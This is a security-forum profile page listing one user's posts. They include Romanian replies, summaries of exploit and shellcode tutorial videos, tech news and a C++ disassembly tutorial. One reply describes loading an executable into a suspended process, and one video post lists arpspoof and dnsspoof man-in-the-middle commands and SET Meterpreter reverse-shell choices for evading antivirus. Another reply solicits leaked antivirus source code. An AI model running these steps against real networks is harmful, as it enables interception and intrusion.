-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
Stai asa sa ghicesc in globul de cristal care e problema cu contul tau...
-
Varianta binara cred ca poate fi mai mica decat dimensiunea sursei. La Kaspersky stiu ca erau mai multe produse, prin 2007, sau cand aparuse o sursa, pe care o am si eu. Insa aveti careva coduri sursa de la Norton sau McAfee? Le-ati gasit pe undeva? Daca gasiti sa postati aici va rog, sunt si oameni interesati, am gasit chestii interesante in codul de la Kaspersky. Edit: http://uk.reuters.com/article/2012/01/14/uk-symantec-hacker-idUKTRE80D09T20120114
-
Inca am fani desi nu mai am timp sa dau banuri si avertismente ca in tinerete.
-
Citeste mai intai despre structura executabilelor: Portable Executable - Wikipedia, the free encyclopedia Peering Inside the PE: A Tour of the Win32 Portable Executable File Format Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format, Part 2 Microsoft PE and COFF Specification Ai putea sa te uiti si peste: The .NET File Format - CodeProject® Problema e ca tu vrei exemplu pentru .NET... Nu prea am vazut exemple in .NET, cauta la sectiunea Programare, o sa gasesti multe lucruri utile, dar de .NET mai putine. Trebuie creat un nou proces (suspendat). Aloci spatiu, si incarci executabilul (la ImageBase, dimensiunea specificata de OptionalHeader, adica SizeOfimage). Trebuie insa sa fii atent sa incarci fiecare sectiune, aliniata la dimensiunea specificata in structura executabilului, dupa ce scrii headerele (primul lucru pe care il faci). Si cu asta l-ai incarcat in memorie, nu e extrem de complicat. Apoi mai trebuie doar sa cedezi executia Entrypoint-ului. WinAPI iti ofera tot ce ai nevoie, poti face identic si in .NET cu dllimport, dar nu are rost. Nu stiu daca .NET are clase si functii speciale pentru astfel de actiuni, ar cam trebui sa fie.
-
Cred ca ai mai instalat o data libnet si nu libnet-dev. root@bt:~/libnet-1.1.5# ./configure Si nu root@bt:~/libnet-dev-1.1.5# ./configureNu stiu, ar trebui sa mearga.
-
Tu ai citit ce am scris eu? configure: error: libnet0 (dev) is required for this program
-
Problema e ca iti trebuie libnet development headers (de la development provine acel "dev" de acolo, libnet probabil era deja instalata). Cred ca asta e: libnet-dev | Free software downloads at SourceForge.net
-
Astea sunt arhicunoscute, sunt multe alte "comenzi"... Deschide executabilul de la messenger cu un Hex Editor si uita-te pe acolo.
-
In multe locuri apare de la dracia asta de iconita: http://mystatus.skype.com/smallicon/sample.skype90 O sa reparam azi-maine.
-
How to get iTunes Apps / Movies / Albums / Music for free!
Nytro replied to The_Arhitect's topic in Tutoriale in engleza
Ceva cu mai mult de 10 randuri nu sunteti in stare sa cititi si sa va dati cu parerea. -
Intro To Exploits - Part 1 http://www.youtube.com/watch?v=NzGB-8Sntqc&feature=player_embedded Description: **This video and Part 2 Segment 1 are more lecture based videos** What's in this video? -Coding Practices -Defining Functions of Interest -Introduction To Shellcode I recommend watching in full-screen due to quality issues. This is part 1 of 5. More to come over the next few weeks. Also, sorry about how I was talking in the video, I'm not a strong speaker. Sursa: Intro To Exploits - Part 1 Intro To Exploits - Part 2 (Shellcode) http://www.youtube.com/watch?v=-QlaRVn1K1o&feature=player_embedded Description: I recommend watching in full-screen due to quality issues. This is the first of two videos for part 2 of 5. The topic of discussion for this video is an expanded explanation of shellcode. -How shellcode is executed -Architecture types -Assembly/hex examples Also, sorry about how I was talking in the video, I'm not a strong speaker. Sursa: Intro To Exploits - Part 2 (Shellcode) Intro To Exploits - Part 2 (Shellcode Cont.) http://www.youtube.com/watch?v=m-AxrZxvu8o&feature=player_embedded Description: ****This video demonstrates the concepts of how shellcode works**** I recommend watching in full-screen due to quality issues. This is the second of two videos for part 2 of 5. This video expands even more on the previous video, and we end Part 2 with a visual example of how shellcode operates. -Different purposes of shellcode -Security evasion -Visual example of shellcode in action (bind and reverse shells) Sursa: Intro To Exploits - Part 2 (Shellcode Cont.) Intro To Exploits - Part 3 (Fuzzing) http://www.youtube.com/watch?v=v3wOMXZykrE&feature=player_embedded Description: The topic of this video is fuzzing. At the end of Part 3, we fuzz a simple tcp echo server. -Types of Fuzzers -How to know if a fuzzer was successful -Finding buffer size I hope you learned a lot as fuzzing is very undocumented outside of the security industry, and the technique itself is more used for auditing many programs with a generic testing tool. The downside of fuzzing is that it is very limited to what it can test, and how deep into a program it can test. Fuzzing is more for an entry point stress test, than it would be for full-on code auditing. Sursa: Intro To Exploits - Part 3 (Fuzzing) Intro To Exploits - Part 4 (Reverse Engineering) http://www.youtube.com/watch?v=kMWc1PiKWUQ&feature=player_embedded Description: ****Topic for the video is Reverse Engineering**** This video covers the basics of disassembling/reverse engineering. This is a great video, as I show you how to explore different functions within gdb. This is an awesome tactic for determining what a program might be able to do. -Exploring the CPU -Differentiating functions from other stack procedures -Finding functions and disassembling them -Finding return addresses Reverse Engineering is a very broad category, and in its own right deserves its own video series. The steps I go through in this video are more for mapping out a program, rather than editing asm code to change execution flow. Sorry for the pause half way through the video. I rage-quited half way through filming it. Sursa: Intro To Exploits - Part 4 (Reverse Engineering) Intro To Exploits - Part 5 (Scenario) http://www.youtube.com/watch?v=5iUaq_H6wf8&feature=player_embedded Description: ***This video is intended for learning purposes only. In no way, shape, or form, is the sole purpose of this video intended as a solution to the IO wargame.*** What's in this video? In this video, we put together all of the information we have learned from the previous videos, and apply it to a practical (but very unlikely) buffer overflow situation. -On the fly exploitation (IO smashthestack level 5) Sursa: Intro To Exploits - Part 5 (Scenario) [h=4]Intro To Exploits - Part 5 (Scenario Cont.)[/h] http://www.youtube.com/watch?v=NzD67lD9OQU&feature=player_embedded Description: ***This video is intended for learning purposes only. In no way, shape, or form, is the sole purpose of this video intended to be used as a solution to the IO wargame.*** This video concludes the previous video, and the series. I hope I have helped new people learn a lot, and refresh the memories of the more seasoned folks. Thank you for watching! Sursa: http://www.securitytube.net/video/2649
-
[h=4]Cracking Hashes From A Meterpreter Session With Hashcat[/h] Description: Cracking Hashes From a Meterpreter Session with Hashcat , FOLLOW @sL0ps Sursa: Cracking Hashes From A Meterpreter Session With Hashcat
-
[h=4]Shellcode2Exe Shellcode Analysis[/h] http://www.youtube.com/watch?v=FTDZyYt7Fqk&feature=player_embedded Description: Converting shellcode into an executable is a simple analysis technique that allows you to use your favorite debugger to analyze the code at run time. This video describes the input and output formats supported by the Shellcode2Exe tool. Sursa: Shellcode2Exe Shellcode Analysis
-
[h=4]Scdbg - Shellcode Analysis[/h] Description: This video covers basic use of the scdbg tool to analyze several types of shellcode. scdbg is a tool written around the libemu library which runs shellcode in an emulated environment and displays all of the Windows API called during execution. scdbg also includes an integrated debug shell and complex options such as a report mode which tell you intimate details about how the shellcode was constructed. scdbg is open source and freely available. Versions are available for both Windows and Linux. Homepage: RE Corner Sursa: Scdbg - Shellcode Analysis
-
[h=3]New Generic Top-Level Domains (gTLDs) out for Sale[/h] Published: 2012-01-13, Last Updated: 2012-01-13 15:44:20 UTC by Guy Bruneau (Version: 1) Yesterday ICANN started accepting applications for new generic top-level domains (gTLDs). "The world of .com, .gov, .org and 19 other gTLDs will soon be expanded to include all types of words in many different languages. For the first time generic TLDs can include words in non-Latin languages, such as Cyrillic, Chinese or Arabic." [1] Last month, the US Federal Trade Commission indicated it has concerns with this change, they are concerned that consumer protection safeguard against bad actors that could lead to potential risk of abuse through existing scams such as phishing sites. [2] Do you see these changes have a potential for concern and abuse or just business as usual? [1] ICANN | New gTLDs Update: Applications Accepted Today; New Guidebook Posted; Financial Assistance for Qualifying Applicants [2] http://www.ftc.gov/os/closings/publicltrs/111216letter-to-icann.pdf [3] Home | ICANN New gTLDs ----------- Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu Sursa: ISC Diary | New Generic Top-Level Domains (gTLDs) out for Sale
-
[h=1]Microsoft confirms UEFI fears, locks down ARM devices[/h] [h=3]By Aaron Williamson | January 12, 2012[/h] At the beginning of December, we warned the Copyright Office that operating system vendors would use UEFI secure boot anticompetitively, by colluding with hardware partners to exclude alternative operating systems. As Glyn Moody points out, Microsoft has wasted no time in revising its Windows Hardware Certification Requirements to effectively ban most alternative operating systems on ARM-based devices that ship with Windows 8. The Certification Requirements define (on page 116) a "custom" secure boot mode, in which a physically present user can add signatures for alternative operating systems to the system's signature database, allowing the system to boot those operating systems. But for ARM devices, Custom Mode is prohibited: "On an ARM system, it is forbidden to enable Custom Mode. Only Standard Mode may be enable." [sic] Nor will users have the choice to simply disable secure boot, as they will on non-ARM systems: "Disabling Secure [boot] MUST NOT be possible on ARM systems." [sic] Between these two requirements, any ARM device that ships with Windows 8 will never run another operating system, unless it is signed with a preloaded key or a security exploit is found that enables users to circumvent secure boot. While UEFI secure boot is ostensibly about protecting user security, these non-standard restrictions have nothing to do with security. For non-ARM systems, Microsoft requires that Custom Mode be enabled—a perverse demand if Custom Mode is a security threat. But the ARM market is different for Microsoft in three important respects: Microsoft's hardware partners are different for ARM. ARM is of interest to Microsoft primarily for one reason: all of the handsets running the Windows Phone operating system are ARM-based. By contrast, Intel rules the PC world. There, Microsoft's secure boot requirements—which allow users to add signatures in Custom Mode or disable secure boot entirely—track very closely to the recommendations of the UEFI Forum, of which Intel is a founding member. Microsoft doesn't need to support legacy Windows versions on ARM. If Microsoft locked unsigned operating systems out of new PCs, it would risk angering its own customers who prefer Windows XP or Windows 7 (or, hypothetically, Vista). With no legacy versions to support on ARM, Microsoft is eager to lock users out. Microsoft doesn't control sufficient market share on mobile devices to raise antitrust concerns. While Microsoft doesn't command quite the monopoly on PCs that it did in 1998, when it was prosecuted for antitrust violations, it still controls around 90% of the PC operating system market—enough to be concerned that banning non-Windows operating systems from Windows 8 PCs will bring regulators knocking. Its tiny stake in the mobile market may not be a business strategy, but for now it may provide a buffer for its anticompetitive behavior there. (However, as ARM-based "ultrabooks" gain market share, this may change.) The new policy betrays the cynicism of Microsoft's initial response to concerns over Windows 8's secure boot requirement. When kernel hacker Matthew Garrett expressed his concern that PCs shipped with Windows 8 might prevent the installation of GNU/Linux and other free operating systems, Microsoft's Tony Mangefeste replied, "Microsoft’s philosophy is to provide customers with the best experience first, and allow them to make decisions themselves." It is clear now that opportunism, not philosophy, is guiding Microsoft's secure boot policy. Before this week, this policy might have concerned only Windows Phone customers. But just yesterday, Qualcomm announced plans to produce Windows 8 tablets and ultrabook-style laptops built around its ARM-based Snapdragon processors. Unless Microsoft changes its policy, these may be the first PCs ever produced that can never run anything but Windows, no matter how Qualcomm feels about limiting its customers' choices. SFLC predicted in our comments to the Copyright Office that misuse of UEFI secure boot would bring such restrictions, already common on smartphones, to PCs. Between Microsoft's new ARM secure boot policy and Qualcomm's announcement, this worst-case scenario is beginning to look inevitable. Sursa: Microsoft confirms UEFI fears, locks down ARM devices - SFLC Blog - Software Freedom Law Center
-
[h=4]Iphone Forensics - On Ios 5[/h] Description: iPhone Forensics goal is to extract data and artifacts from iPhone without altering the information on the device. This video explains the technical procedure and the challenges involved in extracting data from the live iPhone. iPhone Forensics | InfoSec Institute – IT Training and Information Security Resources Sursa: Iphone Forensics - On Ios 5
-
Using Set's Java Applet Attack To Bypass Anti-Virus Software
Nytro posted a topic in Tutoriale video
[h=4]Using Set's Java Applet Attack To Bypass Anti-Virus Software[/h] Description: Demonstration of SET's Java Applet Attack to bypass anti-virus software and obtain Meterpreter shell. Video Notes: ifconfig (View NIC information) macchanger -a eth0 (Change MAC Address) nmap -sn -n 10.10.100.* | grep Nmap (Scan for hosts) route -n (Identify the Gateway) 10.10.100.254 (Gateway) 10.10.100.30 (Attacker) 10.10.100.16 (Victim) ping 10.10.100.16 (Verify Connectivity) echo 1 > /proc/sys/net/ipv4/ip_forward (Enables IP forwarding) cat /proc/sys/net/ipv4/ip_forward (View status of IP forwarding) pico dns (Create DNS table for dnsspoof) arpspoof -i eth0 -t 10.10.100.254 10.10.100.16 (Man in the middle attack part 1) arpspoof -i eth0 -t 10.10.100.16 10.10.100.254 (Man in the middle attack part 2) dnsspoof -i eth0 -f dns (Website Redirect) SET menu 1 -> Social Engineering Attacks 2 -> Website Attack Vectors 1 -> Java Applet Attack Method 2 -> Website Cloner 13-> ShellCodeExec Alphanum Shellcode 1 -> Windows Meterpreter Reverse TCP I apologize in advance for the poor editing and TTS narrator. My next videos should be better. Thanks Sursa: Using Set's Java Applet Attack To Bypass Anti-Virus Software -
[h=4]Metasploit Framework Post Exploitation - Windows Security Center[/h] Description: Quick demo as part of post exploitation phase with Metasploit Framework and some tips about the Windows Security Center and the system notifications Sursa: Metasploit Framework Post Exploitation - Windows Security Center
-
[h=2]C / C++ Low Level Curriculum part 2: Data Types[/h]Alex Darby 12:00 pm on November 24, 2011 [h=2]Prologue[/h]Hello and welcome to the 2nd part of the C / C++ low level curriculum series of posts that I’m currently doing. Here’s a link to the first one if you missed it: http://altdevblogaday.com/2011/11/09/a-low-level-curriculum-for-c-and-c/ This post is going to be a little lighter than most of the other posts in the series, primarily because this post is vying for my spare time with my urge to save a blonde girl with pointy ears from the skinny androgynous Demon Lord of extended monologue in a virtual universe powered by three equilateral triangles. Before we continue, I’d like to quickly bring to public note a book that has now been recommended to me many times as a result of the first post: http://www1.idc.ac.il/tecs I can’t personally vouch for it, but I fully intend to buy it and grok its face off as soon as I get some spare time in my schedule. This book looks awesome, and if it is half as good as it looks to be then reading it should be an extremely worthwhile investment of your time… [h=3]Assumptions[/h]The next thing on my agenda is to discuss assumptions. Assumptions are dangerous. Even by writing this I am making many assumptions – that you have a computer, that you can read and understand The Queen’s English, and that on some level you care about understanding the low-level of C++ to name but a few. Consequently, dear reader, I feel that it’s worth mentioning what I assume about you before I go any further. The important thing, I guess, that I should mention is that I assume that you are already familiar with and comfortable using C and/or C++. If you’re not, then I’d advise you to go and get comfortable before you read any more of this [h=2]Data Types?[/h]So, again, I find myself almost instantly qualifying the title of the post and explaining what I mean when I say data types. What I am talking about is the “Fundamental” types of C++ and what you should know about how they relate to the machine level – even this seemingly straightforward aspect of C++ is not necessarily what you would expect; especially when dealing with multiple target platforms. Whilst this isn’t the kind of information that will suddenly improve your code by an order of magnitude, it is (in my opinion) one of the key building blocks of understanding C / C++ at the low level; as it has tonnes of potential knock on effects in terms of speed of execution, memory layout of complex types etc. Certainly, no-one ever sat me down and explained this to me, I just sort of absorbed it or looked it up over the years. [h=2]Fundamental and Intrinsic Types[/h]The fundamental types of C/C++ are all the types that have a language keyword. These are not to be confused with the intrinsic types which are the types that are natively handled by some given CPU (i.e. the data types that the machine instructions of that CPU operate on). Whenever you use new hardware you should check how the compiler for your platform is representing your fundamental types. The best way to do this is (can you guess?) to look at the disassembly window. These days all fundamental types of C++ can be represented by an intrinsic type on most platforms; but you definitely shouldn’t take this for granted, it has only really been the case since the current console hardware generation. There are 3 categories of fundamental type: integer, floating, and void. As we all know, the void type cannot be used to store values. It is used to specify “no type”. For both integral and floating point types there is a progression of types that can hold larger values and/or have more numerical precision. For integers this progression is (from least to most precision) char, short, int, long, long long; and for floats: float, double, long double. Clearly, the numerical value limits that a given type must be able to store mandate a certain minimum data size for that type (i.e. number of bits needed to store the prescribed values when stored in binary). [h=2]Sizes of Fundamental types[/h]As far as I have been able to discover, the C and C++ standards make no explicit guarantee about the specific size of any of the Fundamental types There are, however, several key rules about the sizes of the various types which I have paraphrased below: A char must be a minimum of 8 bits. sizeof( char ) == 1. If a pointer of type char* points at the very first address of a contiguous block of memory, then every single address in that block of memory must be traversable by simply incrementing that pointer. The C standard specifies a value that each of the integer types must be able to represent (see page 33 in this .pdf of the C standard if you want the values - see the header of a standard conformant C++ implementation for details of the values used by your compiler). The C++ standard says nothing about size, only that “There are five standard signed integer types : “signed char”, “short int”, “int”, “long int”, and “long long int”. In this list, each type provides at least as much storage as those preceding it in the list.” (see page 75 in this .pdf of the latest C++ standard I could find). 4 & 5 have similar rules in the C and C++ standard for the progression of floats. Helpfully, MSDN has a useful summary of this information (though it’s partly MSVC specific, it’s a good starting point). Despite all this leeway in the standard, the size of the fundamental types across PC and current gen console platforms is (to the best of my knowledge) relatively consistent. The C++ standard also defines bool as an integral type. It has two values, true and false, which can be implicitly converted to and from the integer values 1 and 0 respectively; and is the return type of all the logical operators (==, !=, >, < etc.). As far as I have been able to ascertain, the standard only specifies that bool must be able to represent a binary state. Consequently, the size of bool can vary dramatically according to compiler implementation, and even within code generated by the same compiler – I have seen it vary between 1 and 4 bytes on platforms I’ve used – I have always assumed that this was down to speed of execution vs. storage size tradeoffs. This ‘size of bool’ issue resulted in the use of bool being banned from use in complex data structures at least one company that I have worked at. I should clarify that this was a ‘proactive’ banning based on the fact that it might cause trouble rather than one that resulted from trouble actually having been caused. We should also mention enums at this point (thanks John!) – the standard gives the storage value of an enumerated type the liberty to vary in size depending on the range of values represented by each specific enum – even within the same codebase – so an enum with values < 255 (or <= 256 members with no values assigned) may well have sizeof() == 1, and one which has to represent 32 bit values would typically have sizeof() == 4. This brings us onto pointers. Strictly speaking pointers are not defined as one of the fundamental types, but the value of a pointer clearly has a corresponding data size so we’re covering them here. The first thing to note about pointers is that the numeric limits required for a pointer on any given platform are determined by the size of the addressable memory on that platform. If you have 1 GB of memory that must be accessible in 1 byte increments, then a pointer needs to be able to hold values up to ((1024 * 1024 * 1024) – 1), which is (2^30 -1) or 30 bits. 4GB is the most that can be addressed with a 32 bit value – which is why win32 systems can’t make use of more than 4GB. For example, when compiling for win32 with VS2010, pointers are 32 bit (i.e. sizeof() ==4), and when compiling for OSX with XCode (on the Macbook Pro I use at work for iOS development) pointers are 42 bit (sizeof() ==6). One thing that is definitely worth noting is that all data pointers produced by a given compiler will be the same size (n.b. this is not true of function pointers). The type of a pointer is, after all, a language level abstraction – under the hood they are all just a memory address. This is also why they can all be happily converted to and from void* – void* being a ‘typeless pointer’ (n.b. function pointers cannot be converted to or from void*). That said, knowing the type of the pointer is absolutely crucial to the low level of many of the higher level language mechanisms – as we shall see in later posts. [h=3]Addendum[/h]So, following on from a couple of the comments, I need to cover function pointers as separate from data pointers. I made an incorrect assertion that all pointers were the same size. This is only true of data pointers. Function pointers can be of different sizes precisely because they are not necessarily just memory addresses – in the case of multiply inherited functions or virtual functions they are typically structures. I recommend the blog that Bryan Robertson linked me to, as it gives a concrete example of why pointer to member functions often need to be more than a memory address: http://blogs.msdn.com/b/oldnewthing/archive/2004/02/09/70002.aspx I also found these useful links relating to function pointers and void* (this whole site is pretty damn useful in fact): http://www.parashift.com/c++-faq-lite/pointers-to-members.html#faq-33.10 http://www.parashift.com/c++-faq-lite/pointers-to-members.html#faq-33.11 Thanks to Bryan and Jalf for pushing me to find out more [h=2]Intrinsic Types used by Fundamental Types[/h]As I mentioned up front, this varies between the various platforms – and even then there’s no guarantee that the compiler will do the “sensible” thing and use all the intrinsic types supported by the platform you’re using. Here is a screenshot of a win32 console app I knocked up that prints the sizes of the Fundamental types as created by compiling for win32 under VS2010: C++ Fundamental types (win32 compiled on Windows 7 with VS2010) My home machine is a 64 bit intel thing of some description, about a year old. Since the processor is 64 bit, I’d hope that all of these sizes correspond to intrinsic types (8 bytes being the size of a 64 bit CPU register), however since I’m compiling for win32 (which can only fit 4 bytes in a standard CPU register) I’m guessing that it won’t be using intrinsics for types > 32 bit. adding 2 long long values and storing the result in a 3rd long long In any event, I can’t be sure without looking at the disassembly. <…pause to add some simple test code with long long and run it…> Sure enough, these 8 byte long long values are being handled as 2 32bit values. Ignoring the actual addition, you can clearly see this because the code initialising llTest and llTest2 is setting them in two separate steps for the upper and lower 32 bits of the 64 bit values. So now I know, and it wasn’t even scary – really I should go and check the rest of them… [h=2]Fancy Intrinsics[/h]Most modern CPUs have fancy intrinsics – e.g. 128 bit vector registers that can store and operate on four-32bit-floats-in-one-value sort of stuff. In theory these sorts of extra intrinsics can provide big wins in certain situations – e.g. heavy duty chunks of vector maths, or non vector maths that can be parallelised into vectors. The chances are that your compiler won’t ever use these without you asking it nicely. There are plenty of good reasons why this is the case (apparently), but you should find that support for these hardware specific intrinsics will be mentioned in your hardware / compiler manuals. [h=2]Summary[/h]So, what would I like you to take away from this? Firstly, that there is a difference between the data types of the C++ language and the hardware data types. Secondly, don’t just trust that your compiler is doing what would intuitively seem sensible to you. Check its work. Thirdly, it’s not rocket science! You can find out by just modifying one of the sample programs for your new hardware and then looking at the disassembly in the debugger. Finally, thought I might insert a few points of note here: Almost all CPUs have 8 bit bytes. Any CPU with more than 8 bits per byte was probably designed by a maniac / genius (n.b. I find that there is a particularly fine line between the two in Computer Science circles). One thing you need to watch out for with numerical types is that in the C standard, int and short both have the same numerical limit (unsigned int and unsigned short both have 0xFFFF (i.e. 16 bits)). I’ve never had a problem with it, but an int could be represented as 16 bit. If you want to know the size of any given type just use the sizeof() keyword. Your compiler knows these things. [h=2]Epilogue[/h]If you are hungry for more information on this level (i.e. fundamental and intrinsic types) I recommend searching #AltDevBlogADay, because there are loads to choose from… Here are a few of articles I found when doing a quick search (apologies to those whose articles I missed as a result of less than thorough searching!): http://altdevblogaday.com/2011/08/21/practical-flt-point-tricks/ http://altdevblogaday.com/2011/08/06/demise-low-level-programmer/ http://altdevblogaday.com/2011/11/10/optimisation_lessons/ Sursa: http://altdevblogaday.com/2011/11/24/c-c-low-level-curriculum-part-2-data-types/
-
A Low Level Curriculum for C and C++ Alex Darby 4:00 am on November 9, 2011 Background In my last post I wrote Why I became an Educator I was bemoaning the lack of focus on Low Level understanding that seems to have afflicted Computer Science degree courses of recent times (at least in the UK…). As a result, I received a comment from someone called Travis Woodward that said: There are plenty of students out there who are more than willing to dive into low level stuff, but its hard to know where to start or even what to learn (the old ‘you don’t know what you don’t know’ problem). I’ve looked around for something approaching a low level curriculum, but they tend to just be lists of topics which aren’t actually that helpful without context and suggested resources to start you off. The best intro I’ve found so far is a course called CS107: Programming Paradigms from Stanford on iTunesU, which has a good section on how C and C++ look to a compiler. So if any low level programmers want to put together a low level curriculum with suggested resources, then please do! This is of course a commendable idea, and so I decided to get started on it… Low Level Curriculum? Before I go any further, I’d like to clarify what I mean by “Low Level Curriculum”. During my time in the industry I’ve helped architect and build a multi-platform once-Next-Gen-now-current-gen engine and tool chain, I’ve written plenty of shaders, tracked down countless hideous bugs by looking at disassembly and memory windows, hunted down the odd submission blocking threaded race condition, and on several occasions had to hand-unpick the broken stacks of core dumps from PS3 / X360 test decks to find bugs that only occur “in the wild”; but that doesn’t make me a low level programmer – this is the kind of thing I’d expect anyone with my sort of experience to have done. I’ve never sat for hours poring over GPad or Pix captures, I’ve never really had to worry about stuff like patching fragment shaders or batched physics calculations on SPUs, or how to get the most from my AltiVecs, and I’ve certainly never had to re-code large chunks of code in assembler taking advantage of caching or sneaky DMA modes to get a few extra FPS out of anything – this is what low level programmers do, platform specific hardware optimised code usually written to get the best performance out of a machine. This curriculum is not about learning to be a low level programmer. What it is about is gaining a solid understanding of the low level implementational underpinnings of C and C++ * – an understanding that I strongly feel should be the base line for any programmer working in games. Over the course of however many posts this eventually takes up I’ll be covering: Data types Pointers, Arrays, and References Functions and the Stack The C++ object model (several posts) Memory (again, several posts) Caches Assuming you read and understand all of the posts in this series – and that I manage to communicate the information effectively – you should end up in a place where for any given “foible” of the language you understand not only that it exists but also – and most crucially – why it exists. For example, you may (or may not) know that virtual function calls don’t work in constructors, before the end of this series of posts you will understand why they can’t work in constructors. Again just to be clear, I’m not necessarily talking about the same level of understanding of this as someone who writes compilers for their day job; but certainly a level of understanding that gives you a much better idea of what is likely to be going on at the level of the underlying engine that C++ sits on top of, and which consequently enables you to far better understand the implications of the code you write. * N.B. to be 100% clear, C will be covered strictly as a subset of C++. There is no source code available for the current location. Aieeee! Spare me the hexadecimal! I’m sure the vast majority of programmers who use Visual Studio? freak out the first few times they see this dialog. I know I did. I learned to program primarily in a green (or orange if the green screens were taken) screen dumb terminal Unix mainframe environment. You know, like they have in old films like Alien. The second and third year students had priority use of the XWindows machines (and the few Silicon Graphics workstations were for 3rd year graphics projects only), so dumb terminals were where I learned my trade. Even on the XWindows machines there was no programming IDE that I was aware of – I used EMACS and GNU make files, and the only debugger I had use of was command line GDB, which is not what you’d call user-friendly. I got by with std::cout. When I graduated I went from this world of bakelite keyboards, screen burn, and command lines into the bright world of windows 95 development using Visual Studio 4 (slightly before Direct X and hardware accelerated graphics). When I first saw this dialog box you can bet your life I freaked out – and why wouldn’t I? Thanks to the language syntax and code architecture focussed high level teaching methods employed by my university I had no more idea of what went on behind the veil of the compiler than my brief forays into debugging with GDB had afforded me. I’d just got a degree from a well-respected University where they had altogether avoided teaching me about assembler as part of the main syllabus, and I had assumed it was because they were worried it was too much for my puny mind to deal with. Suffice to say, I got over the freaking out part – but I still saw this dialog as a “No Entry?” sign for far longer than I’d like to admit. I only really started to really get over it a few years later when I was working closely with someone who had got a job in games on the strength of their assembler programming. I had a crash, and they just casually leant over and clicked the “Show Disassembly” button. Then, equally casually, showed me exactly why my code was crashing – explaining it in terms of how C++ maps to assembler – and told me how to fix it. This blew my mindgaskets three times because: this person was so casual about it disassembly clearly wasn’t the black magic it appeared to be given it was so simple I couldn’t believe I hadn’t been taught about the low level innards of C++ at University Rending the Veil of Disassembly I really didn’t realise how incredibly important this was until I had the pleasure of meeting a guy called Andy Yelland. If you already know Andy, then you will know exactly what I mean, but for those of you who have not met him I will explain. Andy is one of those people who changes your perspective. He is more or less the polar opposite of the stereotypical ninja-level video game programmer: well dressed, professional, endlessly well-informed, friendly, funny, and socially adept. However, the most amazing thing about Andy is the speed with which he can dissect a console core dump. He just sits there and calmly unpicks the stack, occasionally keeping a few notes about which register some value is in, or looking up the address of a function in a symbol file as he goes, and then in somewhere between 5 minutes and a few hours (depending on how tricky the issue is) he’ll turn around and tell you exactly what the problem was. Not only that, but he’ll happily do this in a codebase he’s never even seen before – and even better, he’s totally happy to sit and explain it all to you as he does it. After sitting with Andy for a few dissections I realised that whilst what he does seems like black magic, it is in fact anything but. It’s about having an expert understanding of how C++ works at the assembly level, and bloody-mindedly applying that knowledge to reverse engineer the state of the system backwards from the current stack state (i.e. when the crash happened) to the point where the bad data was introduced. Clearly this takes a lot of practice, and to get anywhere near as good as Andy at it will take anyone (who isn’t Rain Man?) years of their life. I’m not saying that I think everyone should be able to casually decipher disassembly representing code they didn’t write – I certainly can’t do that. What I am saying is that I think all game programmers should be able to look at disassembly and be able to at least make an educated guess at what is going on, and by leveraging their understanding of how C++ is implemented at the low level – and given time, possibly with some hardware manuals – then they should be able to work it out. The first rule of the Low Level Curriculum for C++: Don’t fear Disassembly Ok, so assuming that you agree with me where do you start? I think the best way to start making sense of it is to look at some simple code in the disassembly window, so let’s do that. Make yourself a test project in a C++ programming IDE of your choice and write some simple code in your main() function. For the sake of argument, let’s say you’re using my weapon of choice – Visual Studio 2010 on a Windows PC. The Code I’m suggesting we look at is this: [TABLE] [TR] [TD=class: line_numbers]1 2 3 4 5[/TD] [TD=class: code]int x = 1; int y = 2; int z = 0; z = x + y;[/TD] [/TR] [/TABLE] Make sure you’re in the “debug” configuration, and put a breakpoint on the line z = x + y; then run the program. When the breakpoint gets hit, right-click in the text editor and choose “Go To Disassembly” from the context menu. DON’T PANIC! NOTE: ensure that you have the same options checked in the right-click context menu! You should now see something that looks something like the image above. Your text will almost certainly be scrolled differently, because I’ve messed about with the window sizes and text position for clarity. The black text with line numbers is clearly the code we compiled, the grey text below each line of code shows the assembler that each line of code generated. So what does it all mean? The hexadecimal number at the start of each line of assembler is the memory address of that line of assembler – remember code is really just a stream of data that tells the CPU what to do, so logically it must be at an address in memory. Don’t worry about these too much, I just wanted to make the point that the instructions are in memory too. mov and add are assembler mnemonics – each represents a CPU instruction, one per line with its arguments. eax and ebp are two of the registers in the x86 CPU architecture. Registers are “working area” for CPUs: fragments of memory that are built into the CPU itself, and which the CPU can access instantaneously. Rather than having addresses like memory, registers are named in assembler because there are usually only a (relatively) small number of them. The eax register is a “general purpose” register, but is primarily used for mathematical operations. The ebp register is the “base pointer” register. In x86 assembler, local variables will typically be accessed via an offset from this register. We will cover the purpose of ebp in later posts. As I alluded to in the previous sentence, ebp-8, ebp-14h, and ebp-20h are the memory addresses (as offsets from the ebp register) storing the values of the local variables x, y, and z respectively. dword ptr [ ... ] means “the 32 bit value stored in the address in the square brackets” (this is definitely true for the Win32 assembler, it may be different for the Win64 one – I’ve not checked). How does it work? Now, we know that the assembler generated by the C++ code we’ve written will initialise the three variables x, y, and z; then add x to y and store the result in z. Let’s look at each line of assembler in isolation (ignoring the address). mov dword ptr [ebp-8],1 This assembler instruction sets the value of the variable x by moving the value 1 into the memory at address ebp-8. mov dword ptr [ebp-14h],2 This assembler instruction sets the value of the variable y by moving the value 2 into the memory at address ebp-14h – n.b. the ‘h’ is necessary because 14 in decimal is a different value from 14 in hexadecimal – this wasn’t necessary when specifying the offset for the value of x because 8 is the same value in decimal and hexadecimal. mov dword ptr [ebp-20h],0 This instruction is, unsurprisingly, setting the value of the variable z. Now we’re up to the interesting part, doing the arithmetic and assigning the result to z. mov eax, dword ptr [ebp-8] This instruction moves the value of the memory at address ebp-8 (i.e. x) into the eax register… add eax, dword ptr [ebp-14h] …this instruction adds the value of the memory at address ebp-14h (i.e. y) to the eax register… mov dword ptr [ebp-20h],eax …and this instruction moves the value from eax into the memory at address ebp-20h (i.e. z). So, as you can see, whilst the assembler looks very different, it is logically isomorphic with the C++ code that it was generated from (i.e. whilst its behaviour may be slightly different, it will give the same output for any given input). Hold on, why did we look at that again? Those of you with brains connected to your eyes will have noticed that the intro to disassembly I just gave was – to use a British colloquialism – “a bit noddy”. In all honesty, that was the whole point of choosing such a simple example. the intention was to show how something as simple as adding two integers and storing the result in a third in C++ maps to assembler. You can use this exact technique to look at the vast majority of the C++ language constructs andsee what they actually generate, and the purpose of this was to show you that it’s simple enough to do. Obviously this example showed only two of the x86 assembler mnemonics, of which there are many more. If you want to make sense of assembler code that is using 